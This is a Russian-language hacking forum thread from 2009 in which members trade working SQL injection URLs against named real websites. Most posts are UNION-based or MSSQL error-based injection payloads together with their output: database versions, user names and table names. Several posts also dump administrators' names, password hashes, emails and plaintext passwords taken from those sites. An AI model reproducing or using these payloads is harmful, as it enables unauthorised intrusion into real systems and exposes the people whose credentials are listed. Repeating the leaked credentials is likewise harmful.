HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 02.05.2009, 08:52
Rav1n
Познающий
Регистрация: 05.11.2008
Сообщений: 92
Провел на форуме:
1562063

Репутация: 149
По умолчанию

Код:
http://www.webypoku.ru/view.php?sec=1&id=-14+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8--
version: 5.0.67-percona-highperf-b7-log
database: tulluk
user: tulluk@localhost

Код:
http://www.webypoku.ru/view.php?sec=1&id=-14+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables--
tables:
Код:
CHARACTER_SETS,CLIENT_STATISTICS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,INNODB_BUFFER_POOL_CONTENT,INDEX_STATISTICS,KEY_COLUMN_USAGE,PROCESSLIST,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TABLE_STATISTICS,TRIGGERS,USER_PRIVILEGES,USER_STATISTICS,VIEWS,INNODB_IO_PATTERN,article,comment,file,lesson,php4func
 
Ответить с цитированием

  #2  
Старый 02.05.2009, 11:44
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

http://www.saratogasoftwaresolutions.com/jobs/details.php?ID=-35+union+select+1,fullname,3,4,5,6,7,8,9,pwd,11,12 ,13,14+from+admin/*

Leanne Madsen
409f66041978caf7e6c02d17042f251d

http://www.expertalent.com/jobs/details.php?ID=-99+union+select+1,fullname,pwd,4,5,6,7,8,9,10,11,1 2,13+from+admin/*

Sam Harrison
601e399c8dfc646df0e1d39ff1e51645


ПР5
http://www.housingnet.co.uk/jobs-details.php?jobid=297+union+select+version()--

4.0.27-standard

Последний раз редактировалось DezMond™; 02.05.2009 в 11:55..
 
Ответить с цитированием

  #3  
Старый 02.05.2009, 12:40
BlackPanther
Новичок
Регистрация: 19.04.2009
Сообщений: 15
Провел на форуме:
139497

Репутация: 10
По умолчанию

Site:
Код:
http://www.canadiansoftwood.com/
SQL -
Уязвимый параметр:
Код:
http://www.canadiansoftwood.com/index.php?mode=news&id=1
Код:
http://www.canadiansoftwood.com/index.php?mode=news&id=-1+union+select+1,CONCAT_WS(CHAR(32,58,32),user(),database(),%20version()),3,4,5,6--
csidb1@localhost : mysql : 4.1.14
Таблица:
Код:
http://www.canadiansoftwood.com/index.php?mode=news&id=-1+union+select+1,CONCAT_WS(CHAR(32,58,32),user(),database(),%20version()),3,4,5,6+from+user--
 
Ответить с цитированием

  #4  
Старый 02.05.2009, 12:59
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://news.rapmusic.tu2.ru/new.php?st=-1+union+select+1,concat_ws(0x3a,user(),database(),version())
rapmusic3@localhost:rapmusic3:5.0.51a-log
 
Ответить с цитированием

  #5  
Старый 02.05.2009, 15:26
Rav1n
Познающий
Регистрация: 05.11.2008
Сообщений: 92
Провел на форуме:
1562063

Репутация: 149
По умолчанию

Код:
http://avtolampy.com.ua/view.php?id=-288+union+select+concat_ws(0x3a,version(),database(),user())--
version: 5.0.45-log
database: avtolampy1_db
user: avtolampy1_db@s8

tables:
Код:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,catalog,content,jos_adsmanager_ads,jos_adsmanager_categories,jos_adsmanager_columns,jos_adsmanager_config,jos_adsmanager_field_values,jos_adsmanager_fields,jos_adsmanager_positions,jos_adsmanager_profile,jos_banner,jos_bannerclient,jos_bannerfinish,jos_categories,jos_components,jos_contact_details,jos_content,jos_content_frontpage,jos_content_rating,jos_core_acl_aro,jos_core_acl_aro_groups,jos_core_acl_aro_sections,jos_core_acl_groups_aro_map,jos_core_log_items,jos_core_log_searches,jos_groups,jos_mambots,jos_menu,jos_messages,jos_messages_cfg,jos_modules,jos_modules_menu,jos_newsfeeds,jos_poll_data,jos_poll_date,jos_poll_menu,jos_polls,jos_sections,jos_session,jos_stats_agents,jos_template_positions,jos_templates_menu,jos_users,jos_usertypes,jos_weblinks
Код:
http://avtolampy.com.ua/view.php?id=-288+union+select+concat_ws(0x3a,id,name,username,email,password)+from+jos_users--
62:Administrator:admin:support@jr.net.ua:2cdcbe2c0 a133787ceeb5516360c1cde

admin:xlsqbq
 
Ответить с цитированием

  #6  
Старый 02.05.2009, 15:31
BlackPanther
Новичок
Регистрация: 19.04.2009
Сообщений: 15
Провел на форуме:
139497

Репутация: 10
По умолчанию

Site:
Код:
http://www.belvneshstrakh.by/
SQL -
Уязвимая перемен
Код:
http://www.belvneshstrakh.by/ru//?page=news&id=1+union+select+1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),%20version()),4,5,6,7--
bvs@localhost : belvneshstrakh_by : 5.0.45-log
Код:
http://www.belvneshstrakh.by/ru//?page=news&id=-1+union+select+1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),%20version()),4,group_concat(table_name),6,7+from+information_schema.tables--
Table:
Код:
:::CHARACTER_SETS,:::COLLATIONS,:::COLLATION_CHARACTER_SET_APPLICABILITY,:::COLUMNS,:::COLUMN_PRIVILEGES,:::KEY_COLUMN_USAGE,:::PROFILING,:::ROUTINES,:::SCHEMATA,:::SCHEMA_PRIVILEGES,:::STATISTICS,:::TABLES,:::TABLE_CONSTRAINTS,:::TABLE_PRIVILEGES,:::TRIGGERS,:::USER_PRIVILEGES,:::VIEWS,:::image,:::news,:::page,:::sections
 
Ответить с цитированием

  #7  
Старый 02.05.2009, 16:40
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
Отправить сообщение для RulleR с помощью ICQ Отправить сообщение для RulleR с помощью Yahoo
По умолчанию

mssql-inj
version
Код:
http://www.harrisinteractive.com/harris_poll/index.asp?PID=792+or+1=@@version--
db_name
Код:
http://www.harrisinteractive.com/harris_poll/index.asp?PID=792+or+1=(select+db_name())--
system_user
Код:
http://www.harrisinteractive.com/harris_poll/index.asp?PID=792+or+1=(select+system_user)--
tables
Код:
http://www.harrisinteractive.com/harris_poll/index.asp?PID=792+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('Poll','AdminVerify','dtproperties','sysconstraints','syssegments'))--
columns of table AdminVerify
Код:
http://www.harrisinteractive.com/harris_poll/index.asp?PID=792+or+1=(select+top+1+column_name+from++information_schema.columns+where+table_name='AdminVerify'+and+column_name+not+in+('AdminName','AdminPassword'))--
Data acquisition
Код:
http://www.harrisinteractive.com/harris_poll/index.asp?PID=792+or+1=(select+top+1+cast(AdminName+as+nvarchar)%2B%27%3A%27%2Bcast(AdminPassword+as+nvarchar)+from+AdminVerify)--
 
Ответить с цитированием

  #8  
Старый 02.05.2009, 17:58
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

ПР5
http://cala.arizona.edu/events/eventdetails.php?id=-66+union+select+1,2,3,table_name,5,6,7,8,9,10+from +information_schema.tables+limit+25,100/*
таблицы:
password
users

пассы:
structure
foundation
skemoody@email.arizona.edu
utrecht
aquafina
raspberry
satellite
 
Ответить с цитированием

  #9  
Старый 02.05.2009, 18:30
erihtoney
Познающий
Регистрация: 03.03.2009
Сообщений: 86
Провел на форуме:
994199

Репутация: 258
Отправить сообщение для erihtoney с помощью ICQ
По умолчанию

MSSQL
Код:
http://www.communication.go.ke/news.asp?id=93+union+select+1,2,3
,4,5,6,7,8+from+users
 
Ответить с цитированием

  #10  
Старый 02.05.2009, 19:13
Rav1n
Познающий
Регистрация: 05.11.2008
Сообщений: 92
Провел на форуме:
1562063

Репутация: 149
По умолчанию

Код:
http://www.cherkov.org.ua/dis.php?nid=-5+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4#
5.0.41-community:f4ltdcom_cherkov:f4ltdcom_vadim@localhos t

tables:
Код:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,test_anti,test_boxing,test_duel,test_enews,test_fightart,test_ganswer,test_guest,test_guns,test_health,t
_______________________

Код:
http://kolesaonline.ru/diski_view.php?code=-20210054+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database(),user()),12--
4.1.22-log:kolesa:kolesa-sql@localhost
_______________________

Код:
http://www.crmru.info/library_article_view.php?article_id=7+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11--

4.0.27-log:micro:micro@195.242.3.251
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ